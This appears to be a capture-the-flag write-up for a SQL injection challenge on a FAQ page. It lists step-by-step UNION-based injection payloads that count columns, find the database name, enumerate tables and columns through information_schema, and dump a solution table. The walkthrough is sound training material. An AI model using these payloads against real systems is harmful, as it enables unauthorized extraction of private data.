Challenge 4: SQL Injection

In the challenge, users are presented with a set of impossible questions and a FAQ page. Users are expected to look for the answers to the questions from SQL injection attacks on FAQ page.

To get the flag, users have to find the answers to the questions listed in the figure on the left. The following FAQ page is needed to look for the answers.

Solutions are shown in the following:

LIKE ‘%[user input]%’ or LIKE “%[user input]%”

SELECT [unknown] FROM [table_name] WHERE [question] LIKE ‘%[user_input]%’

‘ order 6 ; --[one space]

‘ order 5 ; --[one space]

‘ and 1=0 union select 1, 2, 3, 4, 5 ; --

‘ and 1=0 union select 1, 1, 1, database(), 1 ; --

‘ and 1=0 union select 1, 1, 1, table_name,1 from information_schema.tables where table_schema = ‘hkuctfp_db’ ; --

' and 1=0 union select 1,1, 1, column_name,1 from information_schema.columns where table_name = 'solution_table' ; --

' and 1=0 union select 1,1, 1,question, answer from solution_table ; --